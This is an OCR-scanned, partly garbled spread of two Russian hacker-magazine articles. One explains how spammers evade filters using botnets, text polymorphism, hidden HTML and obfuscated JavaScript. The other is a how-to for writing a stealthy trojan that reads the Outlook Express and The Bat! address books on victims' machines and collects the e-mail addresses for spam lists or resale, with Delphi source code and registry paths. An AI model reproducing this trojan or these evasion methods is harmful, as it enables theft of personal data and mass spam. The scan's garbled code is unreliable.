_ № 


gn офессиональные 
грузчики 


Полиморфные технологии на службе спамеров 


ОЖЕСТОЧЕННАЯ БОРЬБА СО СПАМЕРАМИ НЕ ПРИВОДИТ К ИХ ВЫМИРАНИЮ, НАПРОТИВ, 
ПОБУЖДАЕТ РАЗРАБАТЫВАТЬ НОВЫЕ ВИДЫ ОРУЖИЯ. ВСЕ, ЧТО НЕ УБИВАЕТ ЧЕЛОВЕКА, 
ДЕЛАЕТ ЕГО СИЛЬНЕЕ! ИЗВЕЧНАЯ ПРОБЛЕМА МЕЧА И ЩИТА, ПРЕВРАТИВШАЯ КАМЕННЫЕ 


ТОПОРЫ В АТОМНЫЕ БОМБЫ 


версии всех фильтрующих систем и будет «рихто- 
вать» письмо до тех пор, пока оно не обретет дос- 
тойный вид, ничем не выделяющий его среди об- 
щего потока корреспонденции. Затем начнет по- 
иск подходящего proxy или «релея», пригодного 
для массовой рассылки, но отсутствующего в 
DRBL-6a3ax (банки данных, хранящие сведения 
о серверах и узлах, хотя бы однажды замеченных 
в спамерской активности или допускающих массо- 
вую рассылку без авторизации). 


Естественно, чтобы рассылка не была накры- 
та баллистической ракетой через несколько минут 
после ее начала, необходимо предпринять ряд до- 
полнительных шагов. Например, постоянно менять 
дислокацию, используя распределенную сеть дро- 
нов (обыкновенных пользовательских компьюте- 
ров, подключенных к интернету и предварительно 
зараженных червем, установившим back-door). 
Тогда ОВВЁ-базы окажутся бессильны. Ведь артил- 
лерийским огнем весь интернет не накроешь, 


characters that you see in this picture. Why? 


F-KBFS§ Y Dg 


($ ate not case-sensitive. 


Такие искажения легко распознаются человеком, 
но обманывают простейшие сигнатурные фильтры 


а пользователи, занесенные в «черные списки», 
еще и в суд подать могут — с чего это вдруг их ли- 
шили электронной почты?! 

Впрочем, DRBL-6a3b! выявляют и отсеивают 
всего 20%-30% спама. Более серьезную угрозу 
представляют сигнатурные фильтры. Даже если 
рассылка велась с тысячи разных !Р-адресов, 
но рассылалось одно и тоже письмо, любой нор- 
мальный почтовый сервер классифицирует его как 
спам, и адресат не получит рекламы. 

Следовательно, рассылаемые письма долж- 
ны отличаться друг от друга если не по смыслу, то 
хотя бы по форме. А это не так-то просто сделать! 
Содержимое письма уникально и может меняться 
произвольным образом. Ну какому рекламодателю 
понравится, если женские прокладки с крылышка- 
ми будут заменены чугунными трубами с левой 
резьбой?! А телефоны и контактные адреса? 
Для сигнатурного поиска — это самое то! 

Как же все-таки спамерам удалось перехит- 
рить систему фильтров? 
> — каменный век — первые эксперименты. Дав- 
ным-давно, когда интернет был медленным, 
а письма рассылались преимущественно в «го- 
лом» ТХТ, «химичить» с их формой особо не полу- 
чалось. Какое там творчество, какой там полет ха- 
керской мысли... Ладно, берем номер телефона и 
думаем, как бы его видоизменить так, чтобы и 
клиент смог дозвониться, и в то же время фильтр 
не съел. Меняем ноль на букву «О», единицу — 
на «|», тройку — на «3». Также можно добавлять 
пробелы, скобки итире в разных местах. То же са- 
мое можно сделать и с текстом письма — тут да- 
же появляется больше свободы, поскольку поми- 
мо замены сходных по начертанию букв, можно 
заменять слова их синонимами, менять блоки 
текста местами и так далее. 

Еще один хитрый прием — не указывать ко- 
дировку письма, а предоставить получателю или 
его почтовому клиенту определить это автомати- 
чески. Правда, для автоматического определения 
кодировки требуется достаточно длинное письмо, 
аесли оно будет коротким, справиться с этой зада- 
чей сможет только человек. Как следствие, вместо 
одной сигнатуры фильтр получает целую кучу. Ве- 
роятность ложных срабатываний увеличивается, 
а качество распознавания спама — ухудшается. 
Кстати говоря, немногословные рекламные рас- 
сылки в стиле «нары новые, самовывоз, звонить 
шесть-шесть-девять с кодом Чукотки» практичес- 


ки не распознаются никаким фильтрами, посколь- 
ку объем значимой информации в них минимален 
(да и та может быть видоизменена на любой ма- 
нер). А сверху и снизу легко наклеить заголовки 
с приветствиями/поздравлениями. 

Используя «движки», выдернутые из прог- 
рамм, имитирующих некоторое подобие диалога 
с человеком, американские спамеры сумели соз- 
дать генераторы, передающие одно и то же со- 
общение бесконечным множеством вариантов. 
Грубо говоря, некий «компилятор» текста. Обрат- 
ный же процесс выделения ключевой «мысли» 
уже требует применения искусственного интел- 
лекта или сложного лингвистического анализа, 
который в полной мере до сих пор не реализован. 
Кое-что имеется у Касперского, но... могучий рус- 
ский язык снимает проблему «компиляторов 
текстов» сам собой. Уж очень сложно написать 
программу, транслирующую исходное сообщение 
более чем в десяток вариантов. В английском 
с этим проще. Жестко заданный порядок слов 
в предложении, простейшие лексические прави- 
ла, скромный лингвистический набор (вследствие 
которого каждое слово имеет множество синони- 
мов), легкая стыковка слов друг с другом, позво- 
ляющая (с некоторыми ухищрениями) обходить- 
ся без предлогов. 

Русский язык обладает развитой системой 
сложных правил с кучей исключений. Одна мышь, 
две (три, четыре) мыши, пять мышей! Вот и попро- 
буй все это заложить в программу. Тем не менее, 
работа над созданием «компиляторов» русского 
текста ведется и весьма активно. Взять хотя бы 
разработчиков игр. Чтобы персонажи не выкрики- 
вали одни и те же навязшие в зубах фразы, необ- 
ходимо научить машину генерировать произволь- 
ные фразы на основе заданной мысли. А в игровой 
индустрии замешаны совсем не малые деньги, 
и есть все основания предполагать, что такие гене- 
раторы когда-нибудь появятся. Тогда ни синтакси- 
ческий, ни лексический анализ ни за что не сможет 
отличить спам от простого письма. 
> HTML — начало конца. Массовое внедрение 
поддержки формата HTML в почтовые клиенты рас- 
ширило границы спамерской активности и серьез- 
но напрягло фильтры, поскольку теперь, прежде 
чем начинать какой бы то ни было анализ, необхо- 
димо «распарсить» HTML, выделив из него текст, 
по обыкновению тесно перемешанный с тегами. 
А парсинг требует времени и процессорных ресур- 
сов, а вместе с ними еще и знания психофизичес- 
ких моделей и особенностей зрительной системы 
человека. Иначе можно очень просто разместить 
между символами сообщения «невидимый» текст: 
мелкий шрифт или шрифт, по цвету полностью или 
практически полностью совпадающий с фоном. Это 
все просто и понятно. А вот то, что ярко-желтый 
плохо различим на фоне ярко-зеленого, знает уже 
не каждый (фильтр). 

Современные фильтры, конечно, HTML прек- 
расно знают, а сам факт наличия «невидимого» 
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текста трактуют как спам, даже не прибегая к сиг- 
натурному поиску. К тому же «продвинутые» поч- 
товые клиенты типа The Bat! имеют режим «упро- 
щенного HTML», игнорирующий цвета, шрифты 
и прочую дребедень подобного типа. Что очень 
удобно для чтения писем от респондентов, изобра- 
жающих из себя гениев дизайна на уровне третье- 
го класса. Естественно, в упрощенном режиме 
отображения весь невидимый текст вылезает на 
поверхность, делая сообщение совершенно нечи- 
таемым. То же самое относится и к обычным поч- 
товым клиентам. Пускай, спамер перемешал но- 
мер контактного телефона невидимыми символа- 
ми. Заинтересованный клиент копирует его в бу- 
фер обмена (не вручную же его перебивать) и... 
к своему удивлению, вместо телефона видит ка- 
кую-то невменяемую хрень. 

Короче, от всех этих фокусов с НТМЁом cna- 
меры постепенно отказались, поскольку они себя 
не оправдали ни с какой стороны. Фильтры подтя- 
нули качество распознания HTML-cnama до преж- 
ней отметки (и даже перешагнули ее, с учетом не- 
ТИПИЧНЫХ ДЛЯ «честных» писем «извращений»). 
А пользователи, даже те, что заинтересовались 
рекламой, не всегда могли ей воспользоваться. 
Плюс ко всему рассылка HTML'a длится дольше 
и обходится гораздо дороже (в плане трафика). 
А скорость рассылки определяет все! Как только 
образцы непрошеной корреспонденции попадают 
в DRBL-6a3bI, то даже при условии 100% полимор- 
физма (совершенно недостижимого в HTML'e) 
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СЕЙЧАС В НАУЧНЫХ ИНСТИТУТАХ ВСЕГО 
МИРА ИДЕТ ИНТЕНСИВНАЯ РАБОТА ПО 
СОЗДАНИЮ «СМЫСЛОВЫХ» 
АНАЛИЗАТОРОВ ДЛЯ РУССКОГО 

И АНГЛИЙСКОГО ЯЗЫКОВ. РАЗБИВАТЬ 
ПРЕДЛОЖЕНИЕ НА ЧАСТИ 

РЕЧИ (ВО ВСЯКОМ СЛУЧАЕ, 

ДЛЯ АНГЛИЙСКОГО ЯЗЫКА) НАУЧИЛИСЬ 
УЖЕ ДАВНО, ЗАТЕМ ОБЪЯСНИЛИ 
МАШИНЕ, КАК ЭТИ ЧАСТИ СВЯЗАНЫ 
ДРУГ С ДРУГОМ. ПРИБЛИЗИТЕЛЬНЫЙ 
СМЫСЛ УДАЕТСЯ ВОССТАНОВИТЬ, 
ДАЖЕ ЕСЛИ ЗНАЧИТЕЛЬНАЯ ЧАСТЬ 
СЛОВ ОТСУТСТВУЕТ В МАШИННОМ 
СЛОВАРЕ. 


ПОБОЧНЫМ ЭФФЕКТОМ СОЗДАНИЯ 
ТАКИХ АНАЛИЗАТОРОВ СТАНЕТ 
ОКОНЧАТЕЛЬНАЯ ПОБЕДА НАД СПАМОМ, 
ПОСКОЛЬКУ, НЕЗАВИСИМО ОТ ФОРМЫ 
РЕКЛАМНОГО СООБЩЕНИЯ, ЕГО СУТЬ 
ОСТАЕТСЯ ПРЕЖНЕЙ — РЕКЛАМНОЙ. 
КОНЕЧНО, ПОЛНОСТЬЮ СМАП 

НЕ ИСЧЕЗНЕТ, ПРОСТО ПРИТИХНЕТ 

НА НЕКОТОРОЕ ВРЕМЯ, А ПОТОМ 
РАЗГОРИТСЯ НОВЫЙ ВИТОК БОРЬБЫ! 
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Зараженные 
компьютеры 


Почтовый сервер 


юзер 


Использование компьютеров-дронов 
для обхода DRBL-6a3 


|Р-адреса начинают давить один за другим. И даже 
очень крупная армия дронов гибнет за считанные 
десятки минут. 

> = король палитра первый. Эпидемии графичес- 
кого спама то вспыхивают, то затухают. Вначале 
это были просто картинки, вставленные в «чест- 
ный» НТМЕ-текст с номерами контактных телефо- 
нов и прочей уникальной информацией, однознач- 
но идентифицирующей спам. Фильтры первых по- 
колений игнорировали картинки, но были быстро 
доработаны, и полноводный поток спама, захле- 
стнувший интернет, сразу иссяк. Тогда спамеры 
применили готовые генераторы изображений, 
предотвращающие автоматическую регистрацию 
на почтовых серверах и вносящие в начертания 
символов некоторые искажения. Казалось бы, 
фильтры, не рыпаясь, должны были дружным 
строем идти сдаваться на мясокомбинат, но все 
вышло совсем не так... 

Незначительные искажения (или невысокая 
степень зашумленности изображения) фильтры 
распознают чисто статистическим методом по кри- 
вой Гаусса (кто изучал метрологию, знает, что это 
за штука). Да, фильтр не в состоянии ОСВ'ить 


Почтовый сервер 


изображение, но это ему и не нужно. Имея в своем 
распоряжении большое количество случайным об- 
разом искаженных изображений, он просто выде- 
ляет свойственные им «родственные черты» и па- 
лит на месте. 

Значительные искажения уже не распознают- 
ся фильтрами, но чтобы их разобрать, получателю 
приходится совершать значительное насилие над 
собой, натягивая глаза на... Это же насколько его 
должна заинтересовать реклама, чтобы он так изв- 
ращался... Так что, независимо от количества ус- 
пешно доставленных писем, эффективность такого 
спама близка к нулю. И популярность тоже. 
> царствие жабье. Подлинный полиморфизм 
стал достижим только с появлением в HTML скрип- 
товых языков (в частности, Java Script), проникших 
даже в популярные почтовые клиенты. Казалось 
бы, зачем электронному письму тащить на своем 
борту какой-то там язык. Это же ведь не сайт, 
в конце концов! Тем не менее, применение ему все- 
таки нашлось. Например, сотрудники компании по- 
лучают по мылу некоторую форму, a Java тут же 
проверяет корректность заполнения полей, исклю- 
чая наиболее глупые ошибки. Более разумного 


применения скриптам придумать, пожалуй, невоз- 
можно. Но, мало того, что они служат неиссякае- 
мым источником ошибок, приводящих к возмож- 
ности захвата управления компьютером или утеч- 
ке конфиденциальных данных, так они еще и спа- 
мерам помогают! 

Полиморфный Java/VBasic-cnam делится 
на две категории. Первая (самая многочисленная 
и самая простая в реализации) основана на функ- 
ции (функциях), расшифровывающей текст пос- 
лания и выводящей его в окно почтового клиента 
«на лету». Поскольку ключ шифрования может 
меняться с каждым письмом, то сигнатурному 
фильтру необходимо иметь на своем борту полно- 
ценный виртуальный интерпретатор, «перераба- 
тывающий» скрипты и анализирующий выдавае- 
мое ими содержимое. Это же какие аппаратные 
мощности иметь надо, чтобы выполнять такой 
анализ в реальном времени?! Поставишь такой 
фильтр, и бумажная почта будет ходить быстрее 
электронной! Но есть одна очень веская зацеп- 
ка — шифруя содержимое письма, сам код шиф- 
ратора остается неизменным и может быть ис- 
пользован в качестве сигнатуры. 

Полиморфики второй категории не только ге- 
нерируют случайный ключ, но и произвольным об- 
разом модифицируют сам расшифровщик, препят- 
ствуя выделению устойчивой сигнатуры. Для этого 
спамеру даже не требуется рвать себе задницу, 
поскольку появилось множество готовых Java-06- 
фускаторов, запутывающих исходный код скрипта 
до такой степени, что в нем не остается ни одной ус- 
тойчивой сигнатуры, и, следовательно, все фильт- 
ры отдыхают. Правда, сам факт наличия запутанно- 
го Чауа-кода указывает на явную ненормальность 
письма, выдавая его спамерскую принадлежность, 
поскольку у него совсем другое частотное соотно- 
шение }ауа-команд. 

Вот и приходится хитрить, создавая готовые 
генераторы функций-шифраторов/дешифраторов, 
ни статистически, ни «лингвистически» не отличи- 
мых от прочих {ауа-функций, которые все чаще 
и чаще встречаются в обычных письмах. И здесь 
фильтры уже вынуждены проявлять осторожность. 
> — завтра. С приходом в Сеть коммерции ее 
накрыл рекламный мрак, и от спама уже никуда 
не уйти. Единственный позитивный момент, кото- 
рый нельзя не отметить, — спам становится все 
более качественным и контекстно-чувствитель- 
ным. Над созданием сообщений серьезно работа- 
ют, и нужная информация сразу же бросается 
в глаза и оседает в мозгу даже после того, как че- 
ловек рефлекторно нажмет <DEL>. К Tomy же, 
зная IP-agpec получателя (а в большинстве случа- 
ев его можно установить тем или иным путем), 
спамер определяет его географическую принад- 
лежность и шлет рекламу, соответствующую мес- 
ту обитания «жертвы». Может быть, развиваясь в 
таком ключе, спам перестанет быть злом? © 
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Размер спам-листа определяется наличием у тебя 
свободного времени, a также желанием его собирать. 
Если раз в день уделять хотя бы часик сборке мыль- 
ников, то за месяц-другой у тебя уже будет солидная 
база. Даже если ты передумаешь заниматься рас- 
сылкой спама, то можешь попросту взять и продать 
свой собранный спам-лист другим спамерам. 

> — где собирать. Искать нужно непосредственно 
на тех ресурсах, где пользователям приходиться 
указывать свои e-mail адреса — на форумах, в гос- 
тевых книгах и так далее. Помимо интернета мыль- 
ники можно собирать еще по адресным книгам поч- 
товых клиентов, установленных на компьютерах 
пользователей. Если, к примеру, получить доступ 
к адресной книге какого-нибудь более-менее круп- 
ного предприятия, то можно неплохо пополнить 
свой спам-лист. Причем пополнить ценными адре- 
сами, так как в основном компании ведут переписку 
с другими коммерческими предприятиями. 

> — каксобирать. Бегать по всем сайтам и кропот- 
ливо ручками копировать через буфер адреса — 
путь деградации. Все можно оптимизировать. 

> — способ 1 — троянизация. Первым делом рас- 
смотрим, как можно увести базу известных почто- 
вых клиентов на компьютерах каких-нибудь органи- 
заций. Самый простой и верный способ — написать 
свой небольшой троян, который будет считывать 
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Сбор спам-листа 


ОДНОЙ МЫСЛИ «А ПОЧЕМУ БЫ МНЕ НЕ ЗАНЯТЬСЯ РАССЫЛКОЙ СПАМА? ВЕДЬ НА ЭТОМ 
МОЖНО НЕПЛОХО ЗАРАБОТАТЬ!» МАЛО. СОФТ, НЕОБХОДИМЫЙ ДЛЯ РАССЫЛКИ СПАМА, 
МОЖНО СКАЧАТЬ В СЕТИ. А ВОТ СОБРАТЬ СВОЙ СОБСТВЕННЫЙ СПАМ-ЛИСТ — ПРОБЛЕМА. 
ПРИЧЕМ РАЗМЕР СПАМ-ЛИСТА НЕ ВЛИЯЕТ НА ПОЛУЧЕННУЮ ПРИБЫЛЬ 


адресную книгу известных почтовых клиентов и от- 
правлять мыльники на специально подготовленный 
для этой цели почтовый ящик. 

Что должен уметь делать троян? Самое глав- 

ное — он должен уметь читать адресные книги извест- 
ных почтовых программ (Outlook Express, The Bat!) и 
отправлять собранные данные на мыло. Помимо это- 
го он должен незаметно сидеть в системе, иначе мож- 
но получить по шапке раньше времени. 
+ Outlook Express сохраняет свою адресную 
книгу в специальном \\/АВ-файле, поэтому необхо- 
димо определить местоположение файла, а потом 
читать его. Конечно, можно запрограммировать 
троян так, чтобы он просто переслал этот файл те- 
бе, аты уже на месте его прочтешь и сохранишь все 
записи. Способ вроде бы хорош, но примитивен, 
так как, во-первых, тебе потом придется мучаться 
с экспортом, а во-вторых, отправить файл с компа 
жертвы будет тяжелей — многие сейчас обзаводят- 
ся персональными файрволами. 

Чтобы прочитать \\!АВ-файл с адресной кни- 
гой, нужно разобраться с соответствующими АР!- 
функциями (все эти функции можно найти 


в MSDN — www.msdn.microsoft.com). Одна пробле- 
ма — описанные в нем функции приведены с син- 
таксисом С, а мы собираемся кодить на Delphi. Бо- 
лее того, в поставке с Delphi нет модуля, в котором 
описаны эти функции. Кажется, замкнутый круг, 
но нет: группа программистов JEDI 06 этом позабо- 
тилась и написала модуль для работы с \\МАВ. Kpo- 
ме того, в поставке с модулями идет хороший при- 
мерчик, изучив который, ты сможешь легко напи- 
сать свой вариант адресной книги. Скачать модуль 
можешь здесь: ftp://ftp.delphi-jedi.org/api/WAB.zip. 

После закачки разархивируй в какую-нибудь 
папку и обязательно настрой в Delphi путь к моду- 
лю, иначе он не сможет найти его, а в твоем проек- 
те появится куча непонятных ошибок. После вы- 
полнения всех подготовительных процедур запу- 
скай свой Delphi и создавай новый проект. Сразу 
же удали форму из созданного проекта, так как она 
не понадобится. Теперь все готово, чтобы присту- 
пить, собственно, к написанию кода, поэтому подо- 
двигай клаву поближе... 

Первым делом нужно подключить к проекту 
все необходимые модули. Ссылки на модули пере- 


книги 


procedure GetAllEmail; 


const 
TableColumns:record 
count :ulong; 
Definition: array [0..4] of ULONG; 
end = (Count: 5; 
Definition: (PR_DISPLAY_NAME, PR_EMATL_ADDRESS, 
PR_PERSONAL_HOME PAGE, PR_ENTRYID, 
PR_OBUECT_TYPE) ; 
Ve 
var 
_wp:TWabParam; 
_Container: IABContainer; 
_EntryID: PEntryID; 
_EntryIDSize, ObjType: ULONG; 
_Table: IMAPITable; 
_TableRow: PSRowSet; 
_AddrBook: TAddrBook; 
_WabObject: IWabObject; 
_file:TStringList; 
//В процедуре происходит очистка затраченной памяти 
procedure FreeSRowSet (var Р: PSRowSet) ; 
var 
I: Integer; 
begin 
for I := 0 to P*.cRows - 1 do 
_WabObject.FreeBuffer(P*.aRow[I].1lpProps); 
_WabObject.FreeBuffer (P); 
Р := nil; 
end; 
begin 
_fileName:=GetWabPath; 
//ссли полученный путь к адресной книге не существует, тогда выходим 
if not FileExists(_fileName) then Exit; 
//Присваиваем в интерфейсы значение по умолчанию 
_AddrBook:=nil; 
_WabObject:=nil; 
ZeroMemory (@_wp, sizeOf(_wp)); 
_wp.cbSize:=sizeOf (_wp); 
_wp.szFileName:=pchar (_fileName) ; 
_wp.hwnd:=0; 
//Инициализируем память под объект типа TStringList. В нем у Hac будут 
//храниться результаты потрошения книги 
_file:=TStringList.Create; 
//Открываем файл 
WabOpen(_addrbook, _wabObject, @_wp, 0); 
//Определяем идентификатор адресной книги 
_AddrBook.GetPAB(_EntryIDSize, _EntryID); 
//Получаем доступ к интерфейсу адресной книги 
_AddrBook.OpenEntry(_EntryIDSize, _EntryID, nil, 0, 
ObjType, IUnknown(_Container) ); 
//Устанавливаем колонки, значения которых мы хотим получить 
//Перемещаемся в самое начало 
_Container.GetContentsTable(0, _Table); 
_Table.SetColumns(@TableColumns, 0); 
_Table.SeekRow (BOOKMARK_BEGINNING, 0, nil); 
//Перечисляем значение всех колонок 
repeat 
_Table.QueryRows(1, 0, _TableRow) ; 
if _TableRow.cRows > 0 then with _TableRow*.aRow[0] do 
begin 


_file.Add(lpProps[0].Value.lpszAt+' <'+lpProps[1].Value.lpszAt+'>'); 


FreeSRowSet (_TableRow) ; 
end else Break; 
until False; 

//Сохраняем результаты в файл 
_file.SaveToFile(ExtractFilePath(ParamStr(0))+'log.log'); 
_file.Free; 

end; 


(1) 


числяются в разделе Uses. Для прочтения адре- 
CHOU книги понадобятся следующие модули: Win- 
dows, SySuUtils, WabDefs, WabApi, Wablab, Wab- 
Tags, ComObj, Classes. 


Объяви две глобальных переменных: 


Как узнать путь к адресной книге ОЕ? Есть два спо- 
соба: 


— ЗАПУСТИТЬ ПОИСК ВСЕХ ФАЙЛОВ 
С РАСШИРЕНИЕМ WAB В ЛИЧНЫХ ПАП- 
КАХ ПОЛЬЗОВАТЕЛЯ. 


“ СЧИТАТЬ ПУТЬ ИЗ РЕЕСТРА 


В примере воспользуемся вторым способом, 
так как он проще в реализации. Путь к адресной 
книге находится в HKEY_CURRENT_USER\Softwa- 
re\Microsoft\WAB\WAB4\Wab File Мате (в параметре 
«по умолчанию» как раз и будет нужный путь). 
Для определения пути к файлу адресной книги мож- 
но использовать функцию GetWabPath, которая вы- 
глядит следующим образом: 


В самом начале с помощью \\МпАР!-функции RegO- 
репКеу проверяется, существует ли указанная в па- 
раметре ветка реестра. Если она существует (ре- 
зультат 0), тогда с помощью функции RegQueryVa- 
lue считывается значение параметра, в котором 
указан путь к заветному маб-файлу. 

Для чтения файла адресной книги мы написа- 
ли функцию GetAllEmail (смотри листинг 1). 

Сразу после имени процедуры объявлена кон- 
станта, в качестве которой выступает запись Table- 
Columns, определяющая колонки, информацию ко- 
торых будем считывать из WAB-cbalina. В свойстве 
Definition kak раз и перечислены все названия коло- 
нок. Это далеко не единственный вариант. Чтобы 
узнать имена констант, которые отвечают за ту или 
иную колонку, можно, открыв модуль WabTags.pas, 
запустить поиск по словам, начинающимся сРВ_. 
Нас остальные варианты интересовать не будут, так 
как цель — получить все е-тай адреса. 
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йла в TheBat! 


program Рхо)есЕ1; 
uses 
Windows, 
System, 
SysUtils, 
Registry, 
Classes, 
IniFlles; 
{SR *.res} 
var 
_WorkDir:string; 
_reg:TRegIniFile; 
_Ini:TIniFile; 
_appDir:String; 
_adrBookPath:TStringList; 
_db:TStringList; 
_path:string; 
i:integer; 
//Процедура читает файл с адресной книгой 
procedure ReadBook(_fileName:string) ; 
var 
_AddrBook:TFileStream; 
_Buf:array [0..1024] of char; 
_email:String; 
i, index:Integer; 
begin 
//Присваиваем пустое значение в переменную, в которой будет складываться мыльник 
_ета11:=''; 
//Открываем для чтения файл с адресной книгой 
_AddrBook:=TFileStream.Create(_fileName, fmOpenRead) ; 
//Читаем 1024 байта из файла адресной книги 
index:=_AddrBook.Read(_buf, 1024); 
//В циклах проверяем посимвольно считанные данные 
while index>0 do 
begin 
for i:=0 to index do 
begin 
//псли текущий символ является допустимым для 
//мыльника, то мы его оставляем и добавляем к переменной _email 
if ((_buf[i]>'A') and 


(_buf[i]<'z')) or ((_buf[i]>'0') and (_buf[i]<'9')) or 
(_buf[i]='.') or 
(_buf[i]='-') or 
(_buf[i]='_') or 
(_buf[i]='@') then 
begin 
email:=_email+_buf [i]; 
end 
else 
begin 
//псли мы нашли конец строки, TO символов в переменной _email больше 0, и самое 
главное, в ней есть знак а, это значит нам повезло, — мы вытянули нормальный мыльник 
if (_Buf[i]=#13) and (Length(_email)>0) and (pos('@', _email)>0 then 
_db.Add(_email) ; 
_ета11:=''; 
end; 
end; 


//Читаем следующую партию данных 
1пдех:=_АЯагВоок .Веа@Я (_ЪаЁ, 1024); 
end; 

//Освобождаем выделенную память под объект 


Далее идет объявление необходимых переменных. 
После переменных описана локальная процедура 
FreeSRowSet. Она необходима для очищения памя- 
ти, затраченной на чтение определенной строки из 
базы адресной книги. 

После begin идет код самой процедуры, пред- 
назначенной для вытягивания всех адресов. Пере- 
менной _ fileName присваивается результат выпол- 
нения функции GetWabPath. Далее следует про- 
верка: если файл не существует, то просто выхо- 
дим из процедуры (читать-то нечего!). 

С помощью функции ZeroMemory полностью 
очищается структура _wp. Как только структура 
очищена, можно начинать заполнять ее свойства. 
Основное свойство — szFileName, в котором надо 
указать путь к \\/АВ-файлу. Если путь не указан, бу- 
дет использован маб-файл по умолчанию. 

Далее вызывается функция WabOpen, с по- 
мощью которой получаем доступ к адресной книге 
через интерфейс 1АдагВоок. Функции необходимо 
передать следующие параметры: 


™ УКАЗАТЕЛЬ НА ПЕРЕМЕННУЮ 
ТИПА IADDRBOOK, В КОТОРУЮ БУДЕТ 
ВОЗВРАЩЕН РЕЗУЛЬТАТ ВЫПОЛНЕНИЯ 
ФУНКЦИИ; 


™ УКАЗАТЕЛЬ НА ПЕРЕМЕННУЮ 
IWABOBJECT; 


™ УКАЗАТЕЛЬ НА СТРУКТУРУ TWABPARAM; 
— 0 — ЗАРЕЗЕРВИРОВАННЫЙ ПАРАМЕТР. 


Если функция выполнится успешно, то вернется 
S_OK. После выполнения функции можем опреде- 
лить идентификатор адресной книги. Для этого 
необходимо воспользоваться методом GetPab интер- 
фейса |AddrBook. Выполнив метод, можем открыть 
интерфейс адресной книги и использовать его по сво- 
ему усмотрению. Для получения доступа к интерфей- 
су адресной книги нужно воспользоваться методом 
OpenEntry все того же интерфейса 1Ада!Воок. В каче- 
стве параметров этому методу нужно передать: 


— ПОЛУЧЕННЫЙ РАЗМЕР _ENTRYIDSIZE; 


— УКАЗАТЕЛЬ НА ОПРЕДЕЛЕННЫЙ ИДЕН- 
ТИФИКАТОР ВХОДА ЗАПИСНОЙ КНИГИ 
(_ENTRYID); 


— ТИП ИНТЕРФЕЙСА (УКАЗЫВАЕМ NIL, 
ИСПОЛЬЗУЯ ТИП ПО УМОЛЧАНИЮ); 


—` МАСКУ ПРАВ ДОСТУПА (УКАЗЫВАЕМ 0); 


™ УКАЗАТЕЛЬ HA ТИП ОТКРЫТОГО 
ОБЪЕКТА; 


— УКАЗАТЕЛЬ НА ИНТЕРФЕЙС ВХОДА 
(НУЖНО УКАЗАТЬ ПЕРЕМЕННУЮ ТИПА 
IABCONTAINER). 


Tenepb можно получить доступ к «таблице контен- 
та». Она содержит много колонок, но все они нам 
не нужны, поэтому после получения доступа (_Соп- 


tainer.GetContentsTable) с помощью метода SetCo- 
lumns (интерфейса IMAPITable) устанавливаем ко- 
лонки, которые реально понадобятся. 

Запускаем цикл, в котором с помощью мето- 
да QueryRows интерфейса типа IMAPITable получа- 
ем столбцы из таблицы. После этого нужно прове- 
рить, содержит ли таблица запрашиваемые нами 
столбцы (if _TableRow.cRows > 0 then). Если все 
нормально, то можно записывать данные. После 
записи нужно освободить затраченную память. 
>  TheBat! Te, кто не используют OE, на 90% поль- 
зуются TheBat!. Ho тут возникают маленькие пробле- 
мы. Формат адресной книги TheBat! не является от- 
крытым, поэтому невозможно найти какие-нибудь 
модули, позволяющие ее читать. Но если сильно за- 
хотеть, то можно добиться чего угодно :). 

У адресной книги TheBat! нет постоянного 
расположения, она может храниться где угодно. По- 
этому в трояне должна быть предусмотрена функ- 
ция, которая будет искать все файлы с расширени- 
ем ABD (именно такое расширение имеют файлы 
адресной книги). Все бы хорошо, но этот способ до- 
статочно ресурсоемкий, так как сегодня винты име- 
ют достаточно большой объем, и поиск займет мно- 
го времени. Так что альтернативный способ — за- 
пусти редактор реестра и лезь в ветку HKEY_CUR- 
RENT_USER\Software\RIT\The Bat!. Именно здесь 
Бат хранит все свои настройки. 

Среди множества бесполезных параметров 
есть параметр «Working Directory», в котором пропи- 
сан путь к рабочей директории Бата. Именно в этой 
директории находятся все файлы почтовых ящиков. 
То есть если считать значения этого файла, то бу- 
дем знать, где хранятся настройки всех почтовых 
аккаунтов. В корне этой папки должен быть файл с 
настройками адресных книг — ADDRBOOK.INI. В 
нем перечислены все адресные книги, а также ме- 
ста их расположения. 

Если хорошо присмотреться к файлу ABD, 
то среди мусора можно увидеть e-mail адреса. 
Как тогда отделить мыльники от этого мусора? 
Теория чтения файла будет такой: 


1 ОТКРЫВАЕТСЯ ФАЙЛ АДРЕСНОЙ КНИГИ; 


2 ЧИТАЕТСЯ ОПРЕДЕЛЕННАЯ ЧАСТЬ 
ФАЙЛА, НАПРИМЕР 1024 СИМВОЛА; 


3 В ЦИКЛЕ ПРОВЕРЯЕТСЯ КАЖДЫЙ СЧИ- 
ТАННЫЙ СИМВОЛ НА ПРЕДМЕТ ДОПУ- 
CTUMOTO; 


4 ЕСЛИ ОБНАРУЖИВАЕТСЯ СИМВОЛ 
КОНЦА СТРОКИ (#13), ТО ЕСТЬ ВЕРОЯТ- 
НОСТЬ, ЧТО СЧИТАЛИ E-MAIL АДРЕС 

И МОЖНО ЕГО СОХРАНИТЬ. 


Почему ориентироваться именно по символу конца 
строки? Ответ прост — ввод мыльника для нового 
контакта в TheBat! осуществляется в Memo. Каж- 
дый мыльник вводится на отдельной строке. Зна- 
чит, разумно предположить, что в файле адресной 


книги после мыльника должен присутствовать сим- 
вол конца строки. 

Остается только организовать всю эту тео- 
puto в коде. Запускай Delphi, в исходный код проек- 
та вставляй содержимое листинга 2. 

В самом начале основного кода проекта идет 
инициализация переменной для работы с реестром. 
В прошлом примере для доступа к реестру исполь- 
зовали WinAPI, в этот раз упростим себе жизнь и 
воспользуемся готовым объектом для работы с ре- 
естром. После инициализации переменной прове- 
ряется существование ключа HKEY_CURRENT_US- 
ER\Software\RIT\TheBat!. Если он существует, то на 
данном компьютере установлен TheBat!. 

Теперь можно считать значение параметра 
Work Directory, после чего необходимо проверить 
существование папки, указанной в этом параметре. 
Как правило, здесь стоит значение %APPDA- 
TA%\TheBat (%APPDATA% — путь к рабочему ката- 
логу пользователя). Поэтому, выполнив проверку с 
помощью функции DirectoryExists, жутко обломим- 
ся, так как она не умеет автоматически преобразо- 
вывать подобные пути. Как же узнать настоящее, а 
не относительное расположение пути? Есть нес- 
колько способов, в примере используется реестр. 
Путь к рабочему каталогу можно считать с Мего- 
soft\Windows\CurrentVersion\Explorer\Shell Folders. 
Правда, в примере мы немного схитрили, с самого 
начала надеясь, что если не будет конкретной пап- 
ки, то рабочий каталог TheBat! будет в рабочей пап- 
ке пользователя. В большинстве случаев так и есть. 

Как только путь определен, можно открывать 
